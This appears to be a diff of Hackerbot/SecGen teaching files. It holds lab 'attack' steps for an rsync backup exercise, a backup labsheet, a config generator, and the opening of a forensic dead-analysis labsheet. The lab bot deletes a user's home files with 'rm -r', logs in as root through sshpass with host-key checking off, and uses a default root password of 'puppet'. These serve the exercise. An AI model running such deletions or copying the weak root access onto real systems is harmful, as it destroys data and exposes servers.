<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<!-- topic: Rsync differential-->
<prompt>Create a differential backup of <%= $second_user %>'s desktop files to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-differential1/.</prompt>
<!--grep retval=0 when match is found, 1/2 otherwise-->
<post_command>grep '<%= $hidden_flag %>' /home/<%= $main_user %>/remote-rsync-differential1/<%= $second_user %>/personal_secrets/flag > /dev/null; status1=$?; ls /home/<%= $main_user %>/remote-rsync-differential1/<%= $second_user %>/<%= $files.sample %> > /dev/null; status2=$?; echo $status1$status2</post_command>
<condition>
<output_matches>0[1-9]</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>[1-9][1-9]</output_matches>
<message>:( You didn't backup to the specified remote directory.</message>
</condition>
<condition>
<output_matches>00</output_matches>
<message>:( You backed up to the correct location, but it wasn't a differential backup... You probably need to ssh in and delete that last backup and try again.</message>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<attack>
<% $rand_diff2 = SecureRandom.hex(2) -%>
<!--shell on the desktop-->
<!-- topic: Rsync differential-->
<prompt>The <%= $second_user %> user is about to create some more files...</prompt>
<post_command>sudo -u <%= $second_user %> bash -c 'echo "Dont forget the milk" >> /home/<%= $second_user %>/notes; echo "Beep boop beep" >> /home/<%= $second_user %>/logs/log2; echo <%= $rand_diff2 %> > /home/<%= $second_user %>/personal_secrets/really_not_a_flag; echo $?'</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted|Read-only</output_matches>
<message>:( Oh no. Access errors. <%= $second_user %> failed to write the files... The user needs to be able to write to their files!</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>Ok, good... No flag this time, carry on...</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<attack>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<!-- topic: Rsync differential-->
<prompt>Create another differential backup of <%= $second_user %>'s desktop files to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-differential2/.</prompt>
<!--check for the first set of changes (status1), the original files (shouldn't be there)(status2), then the new files(status3)-->
<post_command>grep '<%= $hidden_flag %>' /home/<%= $main_user %>/remote-rsync-differential2/<%= $second_user %>/personal_secrets/flag > /dev/null; status1=$?; ls /home/<%= $main_user %>/remote-rsync-differential2/<%= $second_user %>/<%= $files.sample %> > /dev/null; status2=$?; grep <%= $rand_diff2 %> /home/<%= $main_user %>/remote-rsync-differential2/<%= $second_user %>/personal_secrets/really_not_a_flag > /dev/null; status3=$?; echo $status1$status2$status3</post_command>
<condition>
<output_matches>0[1-9]0</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>[1-9][1-9][1-9]</output_matches>
<message>:( You didn't backup to the specified remote directory.</message>
</condition>
<condition>
<output_matches>[1-9][1-9]0</output_matches>
<message>:( Your differential backup should also include the first set of changes (all changes since the full backup).</message>
</condition>
<condition>
<output_matches>000</output_matches>
<message>:( You backed up to the correct location, but it wasn't a differential backup... You probably need to ssh in and delete that last backup and try again.</message>
</condition>
<else_condition>
<message>:( Something went wrong... Your backup should include all the changes since the full backup (including the first set of changes), but not the original files.</message>
</else_condition>
</attack>
<attack>
<% $rand2 = SecureRandom.hex(2) -%>
<!--shell on the desktop-->
<!-- topic: Rsync-->
<prompt>The <%= $second_user %> user is about to create even more files...</prompt>
<post_command>sudo -u <%= $second_user %> bash -c 'echo "Buy eggs <%= $rand2 %>" > /home/<%= $second_user %>/notes; echo "Beep boop beep beep" >> /home/<%= $second_user %>/logs/log2; echo <%= $rand2 %> > /home/<%= $second_user %>/personal_secrets/<%= $rand2 %>; echo $?'</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted|Read-only</output_matches>
<message>:( Oh no. Access errors. <%= $second_user %> failed to write the files... The user needs to be able to write to their files!</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>Ok, good... No flag this time, carry on...</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<attack>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<!-- topic: Rsync incremental-->
<prompt>Create an incremental backup of <%= $second_user %>'s desktop files to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-incremental1/. Base it on the epoch and also differential2.</prompt>
<!--check for the first set of changes (shouldn't be there)(status1), the original files (shouldn't be there)(status2), the second changes (shouldn't be there)(status3), then the new files (should be there)(status4)-->
<post_command>grep '<%= $hidden_flag %>' /home/<%= $main_user %>/remote-rsync-incremental1/<%= $second_user %>/personal_secrets/flag > /dev/null; status1=$?; ls /home/<%= $main_user %>/remote-rsync-incremental1/<%= $second_user %>/<%= $files.sample %> > /dev/null; status2=$?; grep <%= $rand_diff2 %> /home/<%= $main_user %>/remote-rsync-incremental1/<%= $second_user %>/personal_secrets/really_not_a_flag > /dev/null; status3=$?; grep <%= $rand2 %> /home/<%= $main_user %>/remote-rsync-incremental1/<%= $second_user %>/personal_secrets/<%= $rand2 %> > /dev/null; status4=$?; echo $status1$status2$status3$status4</post_command>
<condition>
<output_matches>[1-9][1-9][1-9]0</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>[1-9][1-9][1-9][1-9]</output_matches>
<message>:( You didn't backup to the specified remote directory.</message>
</condition>
<condition>
<output_matches>0[0-9]{3}</output_matches>
<message>:( You backed up to the correct location, but it wasn't an incremental backup... You probably need to ssh in and delete that last backup and try again.</message>
</condition>
<else_condition>
<message>:( Something went wrong... Your backup should include just the changes since the last backup.</message>
</else_condition>
</attack>
<attack>
<% $rand3 = SecureRandom.hex(2) -%>
<!--shell on the desktop-->
<!-- topic: Rsync-->
<prompt>Again, the <%= $second_user %> user is about to create even more files...</prompt>
<post_command>sudo -u <%= $second_user %> bash -c 'echo "Buy batteries <%= $rand3 %>" > /home/<%= $second_user %>/notes; echo "Beep boop beep beep" >> /home/<%= $second_user %>/logs/log2; echo <%= $rand3 %> > /home/<%= $second_user %>/personal_secrets/nothing_much; echo $?'</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted|Read-only</output_matches>
<message>:( Oh no. Access errors. <%= $second_user %> failed to write the files... The user needs to be able to write to their files!</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>Ok, good... No flag this time, carry on...</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<attack>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<!-- topic: Rsync incremental-->
<prompt>Create another incremental backup of <%= $second_user %>'s desktop files to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-incremental2/.</prompt>
<!--check the first changes (shouldn't be there)(status1), the original files (shouldn't be there)(status2), the second changes (shouldn't be there)(status3), the third changes (shouldn't be there)(status4), and the newest files (should be there)(status5)-->
<post_command>grep '<%= $hidden_flag %>' /home/<%= $main_user %>/remote-rsync-incremental2/<%= $second_user %>/personal_secrets/flag > /dev/null; status1=$?; ls /home/<%= $main_user %>/remote-rsync-incremental2/<%= $second_user %>/<%= $files.sample %> > /dev/null; status2=$?; grep <%= $rand_diff2 %> /home/<%= $main_user %>/remote-rsync-incremental2/<%= $second_user %>/personal_secrets/really_not_a_flag > /dev/null; status3=$?; grep <%= $rand2 %> /home/<%= $main_user %>/remote-rsync-incremental2/<%= $second_user %>/personal_secrets/<%= $rand2 %> > /dev/null; status4=$?; grep <%= $rand3 %> /home/<%= $main_user %>/remote-rsync-incremental2/<%= $second_user %>/personal_secrets/nothing_much > /dev/null; status5=$?; echo $status1$status2$status3$status4$status5</post_command>
<condition>
<output_matches>[1-9][1-9][1-9][1-9]0</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_quiz />
</condition>
<condition>
<output_matches>[1-9][1-9][1-9][1-9][1-9]</output_matches>
<message>:( You didn't backup to the specified remote directory.</message>
</condition>
<condition>
<output_matches>0[0-9]{4}</output_matches>
<message>:( You backed up to the correct location, but it wasn't an incremental backup... You probably need to ssh in and delete that last backup and try again.</message>
</condition>
<else_condition>
<message>:( Something went wrong... Your backup should include just the changes since the last backup.</message>
</else_condition>
<quiz>
<question>Access the backups via SSH. What's the contents of <%= $second_user %>/personal_secrets/nothing_much?</question>
<answer>^<%= $rand3 %>$</answer>
<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<!--shell on the desktop-->
<!-- topic: Rsync-->
<prompt>I am going to attack you now!</prompt>
<post_command>rm -r /home/<%= $second_user %>/*; echo $?</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted|Read-only</output_matches>
<message>:( Oh no. Access errors when deleting <%= $second_user %>'s files... You need to let this happen!</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>I just deleted all <%= $second_user %>'s files! They don't call me Hackerbot for nothin'!</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<attack>
<!--shell on the desktop server-->
<!-- topic: Rsync incremental-->
<prompt>Use all the backups (including differential and incremental) to restore all of <%= $second_user %>'s files on the desktop system</prompt>
<!--check that everything has been restored: the first changes (status1), the original files (status2), the second changes (status3), the third changes (status4), the newest files (status5), and the latest notes (status6) should all be present-->
<post_command>grep '<%= $hidden_flag %>' /home/<%= $second_user %>/personal_secrets/flag > /dev/null; status1=$?; ls /home/<%= $second_user %>/<%= $files.sample %> > /dev/null; status2=$?; grep <%= $rand_diff2 %> /home/<%= $second_user %>/personal_secrets/really_not_a_flag > /dev/null; status3=$?; grep <%= $rand2 %> /home/<%= $second_user %>/personal_secrets/<%= $rand2 %> > /dev/null; status4=$?; grep <%= $rand3 %> /home/<%= $second_user %>/personal_secrets/nothing_much > /dev/null; status5=$?; grep <%= $rand3 %> /home/<%= $second_user %>/notes > /dev/null; status6=$?; echo $status1$status2$status3$status4$status5$status6</post_command>
<condition>
<output_matches>000000</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>00000</output_matches>
<message>:( Close... You restored something, but not everything... Check the order you did your restore commands in.</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>:( You restored something, but not everything...</message>
</condition>
<condition>
<output_matches>[1-9]{6}</output_matches>
<message>:( You didn't restore anything.</message>
</condition>
<else_condition>
<message>:( Something went wrong... Restore everything...</message>
</else_condition>
</attack>
<attack>
<!--shell on the desktop server-->
<!-- topic: Rsync incremental-->
<prompt>Restore <%= $second_user %>'s notes file to its earliest state</prompt>
<post_command>grep '<%= $first_notes %>' /home/<%= $second_user %>/notes > /dev/null; status1=$?; echo $status1</post_command>
<condition>
<output_matches>0</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>[1-9]</output_matches>
<message>:( That's not the earliest state...</message>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
</hackerbot>


@@ -0,0 +1,121 @@
<html>
<head>
<title><%= self.title %></title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="css/github-markdown.css">
</head>
<body>
<style>
.markdown-body {
box-sizing: border-box;
min-width: 200px;
max-width: 980px;
margin: 0 auto;
padding: 45px;
}
.markdown-body h4[id^='hackerbot']:after {
display: inline-block;
float: right;
content: url("images/skullandusb.svg");
width: 30px;
}
article {
float: right;
width: calc(100% - 300px);
}
.toc {
float: left;
font-size: smaller;
color: #1a1d22;
width: 300px;
position: fixed;
height: calc(100% - 56px);
overflow-y: scroll;
font-family: sans-serif;
margin-top: 50px;
}
.toc ul {
list-style-type: none;
padding: 0;
margin-left: 1em;
}
.toc li { /* Space between menu items*/
margin: 1em 0;
}
.toc a {
color: #1a1d22;
text-decoration: none;
}
.toc a:hover {
color: #6c036d;
text-decoration: none;
}
.toc a:visited {
color: #1a1d22;
text-decoration: none;
}
.markdown-body pre {
background-color: #570138;
color: whitesmoke;
}
.markdown-body p code span {
color: black !important;
}
.markdown-body p code {
background-color: whitesmoke;
border: 1px solid #eaecef;
}
.markdown-body img[alt="small-left"] {
max-width: 100px;
float: left;
}
.markdown-body img[alt="small-right"] {
max-width: 100px;
float: right;
}
.markdown-body img[alt="tiny-right"] {
max-width: 30px;
float: right;
}
.markdown-body img[alt="small"] {
max-width: 100px;
display: block;
margin-left: auto;
margin-right: auto;
padding: 15px;
}
mark {
background-color: white;
color: #5b29bd;
font-weight: bolder;
}
@media (max-width: 767px) {
.markdown-body {
padding: 15px;
min-width: 200px;
max-width: 980px;
}
.toc {
float: none;
width: 100%;
position: relative;
overflow: auto;
height: auto;
}
article {
float: none;
width: 100%;
}
}
</style>
<div class="toc">
<%= self.html_TOC_rendered %>
</div>
<article class="markdown-body">
<%= self.html_rendered %>
</article>
<script src="js/code-prettify/loader/run_prettify.js?autoload=true&amp;skin=sunburst&amp;lang=css"></script>
</body>
</html>


@@ -0,0 +1,6 @@
## License
This lab by [*Z. Cliffe Schreuders*](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 3.0 Unported License*](http://creativecommons.org/licenses/by-sa/3.0/deed.en_GB).
Included software source code is also licensed under the GNU General Public License, either version 3 of the License, or (at your option) any later version.
![small](images/leedsbeckett-logo.png)


@@ -0,0 +1,5 @@
## Resources
[http://webgnuru.com/linux/rsync\_incremental.php](http://webgnuru.com/linux/rsync_incremental.php)
[http://everythinglinux.org/rsync/](http://everythinglinux.org/rsync/)


@@ -0,0 +1,219 @@
## Rsync, deltas and epoch backups
Rsync is a popular tool for copying files locally, or over a network. Rsync can use delta encoding (only sending *differences* over the network rather than whole files) to reduce the amount of data that needs to be transferred. Many commercial backup systems provide a managed frontend for `rsync`.
Note: make sure you exited SSH above, and are now running commands on your local system.
Let's start by making a simple ==copy of your /etc/ directory== to a local backup:
```bash
sudo rsync -av /etc /home/<%= $main_user %>/backups/rsync_backup/
```
> Note that the presence of a trailing "/" changes the behaviour, so be careful when constructing rsync commands. In this case we are copying the directory (not just its contents), into the directory rsync\_backup. See the man page for more information.
Rsync reports the amount of data "sent".
Read the Rsync man page ("`man rsync`"), to ==understand the flags we have used== (`-a` and `-v`). As you will see, Rsync has a great deal of options.
Now, let's ==add a file to /etc, and repeat the backup:==
```bash
sudo bash -c 'echo hello > /etc/hello'
sudo rsync -av /etc /home/<%= $main_user %>/backups/rsync_backup/
```
Note that only the new file was transferred (incremental) to update our epoch (full) backup of /etc/.
## Rsync remote copies via SSH with compression
Rsync can act as a server, listening on a TCP port. It can also be used via SSH, as you will see. ==Copy your /etc/ directory to your backup_server== system using Rsync via SSH:
```bash
sudo rsync -avzh --fake-super /etc <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/
```
> Tip: this is all one line
Note that this initial copy will have used less network traffic compared to `scp`, due to the `-z` flag, which tells `rsync` to use compression. ==Compare the amount of data sent== (as reported by Rsync in the previous command -- the `-h` told Rsync to use human readable sizes) to the size of the data that was copied:
```bash
sudo du -sh /etc
```
Now, if you were to ==delete a local file== that had been backed up:
```bash
sudo rm /etc/hello
```
Even if you ==re-sync your local changes== to the backup_server, the file will not be deleted from the server:
```bash
sudo rsync -avzh --fake-super /etc <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/
```
To recover the file, you can simply ==retrieve the backup:==
```bash
sudo rsync -avz --fake-super <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/etc/hello /etc/
```
Note that the `--fake-super` option is used to ensure the recovered file is still owned by root (even though it is not associated with root on the backup_server). This avoids needing root SSH access to the remote machine (which is usually disabled for security reasons) just to retain ownership and so on.
==Read the man page entry for `--fake-super`==
> Hint: `man rsync`, then press '/' followed by '--fake-super$', and enter.
==Delete the file locally, and sync the changes== *including deletions* to the server so that it is also deleted there:
```bash
sudo rm /etc/hello
sudo rsync -avzh --fake-super --delete /etc <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/
```
> Note the added **`--delete`**
==Confirm that the file has been deleted== from the backup stored on the server.
> Hint: login via SSH and view the backups
==Lab book question: Compare the file access/modification times== of the scp and rsync backups. Are they the same or similar? If not, why?
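If you want a quick way to investigate timestamp preservation, `stat` shows modification times. The following self-contained sketch uses plain `cp` as a stand-in (by default `scp` behaves like `cp` and stamps the copy with the current time, while `rsync -a` preserves times, like `cp -p`); the temporary paths are made up for illustration:

```shell
# Create a file with an old modification time, then copy it two ways
tmp=$(mktemp -d)
touch -d '2001-01-01 00:00:00' "$tmp/original"

cp "$tmp/original" "$tmp/copied"        # like a default scp: mtime becomes "now"
cp -p "$tmp/original" "$tmp/preserved"  # like rsync -a: mtime preserved

stat -c '%y %n' "$tmp"/*   # compare the modification times
rm -r "$tmp"
```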
## Rsync incremental/differential backups
If you need to keep daily backups, it would be an inefficient use of disk space (and network traffic) to simply save a separate full copy of your entire system each day. Therefore, it often makes sense to copy only the files that have changed for each daily backup. The comparison can be made against the last backup of any kind (incremental), or against the last full backup (differential).
### Differential backups
==Create a new file== in /etc:
```bash
sudo bash -c 'echo "hello there" > /etc/hello'
```
And now let's ==create differential backups== of our changes to /etc (both local and remote backup copies):
```bash
#local
sudo rsync -av /etc --compare-dest=/home/<%= $main_user %>/backups/rsync_backup/ /home/<%= $main_user %>/backups/rsync_backup_week1/
#remote
sudo rsync -avzh --fake-super /etc --compare-dest=/home/<%= $main_user %>/remote-rsync-backup/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup-week1/
```
> The **-\-compare-dest** flag tells rsync to search these backup copies, and only copy files if they have changed since a backup. Refer to the man page for further explanation.
Look at what is contained in the differential update:
```bash
ls -la /home/<%= $main_user %>/backups/rsync_backup_week1/etc
```
Note that there are lots of empty directories, with only the files that have actually changed (in this case /etc/hello).
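To list only the files that were actually copied (ignoring the skeleton of empty directories), `find` with `-type f` works well. A self-contained sketch with a mock backup tree (substitute your real backup directory for the temporary one):

```shell
# Mock differential backup: an empty directory skeleton plus one changed file
backup=$(mktemp -d)
mkdir -p "$backup/etc/ssh" "$backup/etc/cron.d"
echo hello > "$backup/etc/hello"

find "$backup" -type f    # prints only .../etc/hello, not the empty directories
rm -r "$backup"
```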
Now ==create another change== to /etc:
```bash
sudo bash -c 'echo "hello there!" > /etc/hi'
```
To ==make another differential backup== (saving changes since the last full backup), we just repeat the previous command(s), with a new destination directory:
```bash
#local
sudo rsync -av /etc --compare-dest=/home/<%= $main_user %>/backups/rsync_backup/ /home/<%= $main_user %>/backups/rsync_backup_week2/
#remote
sudo rsync -avzh --fake-super /etc --compare-dest=/home/<%= $main_user %>/remote-rsync-backup/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup-week2/
```
==Look at the contents== of your new backup. You will find it now contains your two new files. That is, all of the changes since the full backup.
==Delete a non-essential existing file== in /etc/, and our test hello file:
```bash
sudo rm /etc/wgetrc /etc/hello
```
Now ==restore from your backups== by first restoring from the full backup, then the latest differential backup ("week2"). The advantage of a differential backup is that you only need two commands to restore your system.
```bash
sudo rsync -avz --fake-super <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/etc/ /etc/
sudo rsync -avz --fake-super <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup-week2/etc/ /etc/
```
> This example is restoring from the remote copy. ==Try restoring from the local copy==.
### Incremental backups
The disadvantage of the above differential approach is that each daily backup gets bigger and bigger until you do another full backup. With *incremental backups* you *only store the changes since the last backup*.
Now ==create another change== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test1'
sudo bash -c 'echo "Another test change" > /etc/hello'
```
Now ==create an incremental backup== based on the last differential backup:
```bash
#local
sudo rsync -av /etc --compare-dest=/home/<%= $main_user %>/backups/rsync_backup/ --compare-dest=/home/<%= $main_user %>/backups/rsync_backup_week2/ /home/<%= $main_user %>/backups/rsync_backup_monday/
#remote
sudo rsync -avzh --fake-super /etc --compare-dest=/home/<%= $main_user %>/remote-rsync-backup/ --compare-dest=/home/<%= $main_user %>/remote-rsync-backup-week2/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup-monday/
```
==Another change== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test2'
```
Now ==create an incremental backup based on the last differential backup and the last incremental backup:==
```bash
#local
sudo rsync -av /etc --compare-dest=/home/<%= $main_user %>/backups/rsync_backup/ --compare-dest=/home/<%= $main_user %>/backups/rsync_backup_week2/ --compare-dest=/home/<%= $main_user %>/backups/rsync_backup_monday/ /home/<%= $main_user %>/backups/rsync_backup_tuesday/
#remote
sudo rsync -avzh --fake-super /etc --compare-dest=/home/<%= $main_user %>/remote-rsync-backup/ --compare-dest=/home/<%= $main_user %>/remote-rsync-backup-week2/ --compare-dest=/home/<%= $main_user %>/remote-rsync-backup-monday/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup-tuesday/
```
Now ==delete a number of files:==
```bash
sudo rm /etc/wgetrc /etc/hello /etc/test1 /etc/test2
```
==Restore /etc== by restoring from the full backup, then the last differential backup, then the first incremental backup, then the second incremental backup.
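The order matters because each layer overwrites the one before it: the full backup is restored first, and the newest backup last. This toy simulation uses plain `cp` and made-up file contents (not the actual rsync commands) just to show why restores go oldest-to-newest:

```shell
work=$(mktemp -d)
mkdir -p "$work/full" "$work/diff" "$work/incr" "$work/restore"
echo v1 > "$work/full/notes"     # state at the full (epoch) backup
echo v2 > "$work/diff/notes"     # changed since: captured by the differential
echo v3 > "$work/incr/notes"     # changed again: captured by the incremental

# Restore oldest-to-newest so later layers overwrite earlier ones
cp -r "$work/full/." "$work/restore/"
cp -r "$work/diff/." "$work/restore/"
cp -r "$work/incr/." "$work/restore/"

cat "$work/restore/notes"   # v3: the latest version wins
rm -r "$work"
```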
### Rsync snapshot backups
Another approach to keeping backups is to keep a snapshot of all of the files, but wherever the files have not changed, a hard link is used to point at a previously backed up copy. If you are unfamiliar with hard links, read more about them online. This approach gives users a snapshot of how the system was on a particular date, without having to have redundant full copies of files.
These snapshots can be achieved using the `--link-dest` flag. Open the Rsync man page, and read about `--link-dest`. Let's see it in action.
==Make an rsync snapshot== containing hard links to files that have not changed, with copies for files that have changed:
```bash
sudo rsync -av --delete --link-dest=/home/<%= $main_user %>/backups/rsync_backup/ /etc /home/<%= $main_user %>/backups/rsync_backup_snapshot_1
```
Rsync reports not having copied any new files, yet look at what is contained in rsync_backup_snapshot_1. It looks like a complete copy, yet is **taking up almost no extra storage space**.
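You can verify this behaviour for yourself: hard-linked names share a single inode, so `stat` reports a link count above 1, and `du` counts the shared data only once. A self-contained sketch (using a throwaway file rather than your actual backups):

```shell
demo=$(mktemp -d)
echo "some data" > "$demo/original"
ln "$demo/original" "$demo/snapshot"   # hard link: same inode, no extra data stored

stat -c '%h %i %n' "$demo"/*   # link count is 2 and the inode numbers match
du -sh "$demo"                 # the file's data is only counted once
rm -r "$demo"
```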
==Create other changes== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test3'
sudo bash -c 'echo "Another test change" > /etc/test4'
```
And ==make a new rsync snapshot==, with copies of files that have changed:
```bash
sudo rsync -av --delete --link-dest=/home/<%= $main_user %>/backups/rsync_backup/ /etc /home/<%= $main_user %>/backups/rsync_backup_snapshot_2
```
==Delete some files==, and ==make a new differential rsync snapshot==. Although Rsync does not report a deletion, the deleted files will be absent from the new snapshot.
==Recover a file from a previous snapshot.==


@@ -0,0 +1,45 @@
#!/usr/bin/ruby
require_relative '../../../../../../lib/objects/local_hackerbot_config_generator.rb'
class IDS < HackerbotConfigGenerator
attr_accessor :web_server_ip
attr_accessor :ids_server_ip
attr_accessor :hackerbot_server_ip
def initialize
super
self.module_name = 'Hackerbot Config Generator IDS'
self.title = 'Dead Analysis'
self.local_dir = File.expand_path('../../',__FILE__)
self.templates_path = "#{self.local_dir}/templates/"
self.config_template_path = "#{self.local_dir}/templates/lab.xml.erb"
self.html_template_path = "#{self.local_dir}/templates/labsheet.html.erb"
self.web_server_ip = []
self.ids_server_ip = []
self.hackerbot_server_ip = []
end
def get_options_array
super + [['--web_server_ip', GetoptLong::REQUIRED_ARGUMENT],
['--ids_server_ip', GetoptLong::REQUIRED_ARGUMENT],
['--hackerbot_server_ip', GetoptLong::REQUIRED_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--web_server_ip'
self.web_server_ip << arg;
when '--ids_server_ip'
self.ids_server_ip << arg;
when '--hackerbot_server_ip'
self.hackerbot_server_ip << arg;
end
end
end
IDS.new.run


@@ -0,0 +1,49 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Hackerbot config for an investigation and analysis lab</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Generates a config file for a hackerbot for a lab.
Topics covered: Dead Analysis.</description>
<type>hackerbot_config</type>
<platform>linux</platform>
<read_fact>accounts</read_fact>
<read_fact>flags</read_fact>
<read_fact>root_password</read_fact>
<read_fact>web_server_ip</read_fact>
<read_fact>ids_server_ip</read_fact>
<read_fact>hackerbot_server_ip</read_fact>
<!--TODO: require input, such as accounts, or fail?-->
<default_input into="accounts">
<generator type="account">
<input into="username">
<value>vagrant</value>
</input>
</generator>
</default_input>
<default_input into="flags">
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
</default_input>
<default_input into="root_password">
<value>puppet</value>
</default_input>
<output_type>hackerbot</output_type>
</generator>


@@ -0,0 +1,29 @@
<html>
<head>
<title><%= self.title %></title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="css/github-markdown.css">
</head>
<body>
<style>
.markdown-body {
box-sizing: border-box;
min-width: 200px;
max-width: 980px;
margin: 0 auto;
padding: 45px;
}
@media (max-width: 767px) {
.markdown-body {
padding: 15px;
}
}
</style>
<article class="markdown-body">
<%= self.html_rendered %>
</article>
<script src="js/code-prettify/loader/run_prettify.js"></script>
</body>
</html>


@@ -0,0 +1,4 @@
## License
This lab by [*Z. Cliffe Schreuders*](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 3.0 Unported License*](http://creativecommons.org/licenses/by-sa/3.0/deed.en_GB).
Included software source code is also licensed under the GNU General Public License, either version 3 of the License, or (at your option) any later version.


@@ -0,0 +1,405 @@
# Analysis of a Compromised System - Part 2: Offline Analysis
## Getting started
> ###==**Note: You cannot complete this lab (part 2) without having saved the evidence you collected during part 1 of the lab.**==
### VMs in this lab
==Start these VMs== (if you haven't already):
- hackerbot-server (leave it running, you don't log into this)
- desktop (this week's)
- desktop (last week's desktop VM, to access your evidence)
- kali (user: root, password: toor)
All of these VMs need to be running to complete the lab.
## Introduction to dead (offline) analysis
Once you have collected information from a compromised computer (as you have done in the previous lab), you can continue analysis offline. There are a number of software environments that can be used to do offline analysis. We will be using Kali Linux, which includes a number of forensic tools. Another popular toolset is the Helix incident response environment, which you may also want to experiment with.
This lab reinforces what you have learned about integrity management and log analysis, and introduces a number of new concepts and tools.
## Getting our data into the analysis environment
To start, we need to ==get the evidence that has been collected in the previous lab onto an analysis system== (copy to /root/evidence on the Kali VM) that has software for analysing the evidence.
If you still have your evidence stored on last week's desktop VM, you can transfer the evidence straight out of /home/*user* to the Kali Linux system using scp:
```bash
scp -r *username-from-that-system*@*ip-address*:evidence evidence
```
> **Note the IP addresses**: run /sbin/ifconfig on last week's Desktop VM, and also run ifconfig on the Kali VM. Make a note of the two IP addresses, which should be on the same subnet (starting the same).
## Mounting the image read-only
**On Kali Linux**:
It is possible to mount the partition image directly as a [*loop device*](http://en.wikipedia.org/wiki/Loop_device), and access the files directly. However, doing so should be done with caution (and is generally a bad idea, unless you are very careful), since there is some chance that it may result in changes to your evidence, and you risk infecting the analysis machine with any malware on the system being analysed. However, this technique is worth exploring, since it does make accessing files particularly convenient.
==Create a directory to mount our evidence onto:==
```bash
mkdir /mnt/compromised
```
==Mount the image== that we previously captured of the state of the main partition on the compromised system:
```bash
mount -o ro,loop evidence/hda1.img /mnt/compromised
```
> Troubleshooting: If you used a VMware VM in the live analysis lab, you may need to replace hda1.img with sda1.img
Confirm that you can now see the files that were on the compromised system:
```bash
ls /mnt/compromised
```
## Preparing for analysis of the integrity of files
Fortunately the "system administrator" of the Red Hat server had run a file integrity tool to generate hashes before the system was compromised. Start by saving a copy of the hashes that were recorded while the system was in a clean state...
<a href="data:<%= File.read self.templates_path + 'md5sum-url-encoded' %>">Click here to download the md5 hashes of the system before it was compromised</a>
==Save the hashes in the evidence directory of the Kali VM, naming the file "md5s".==
==View the file==, to confirm all went well:
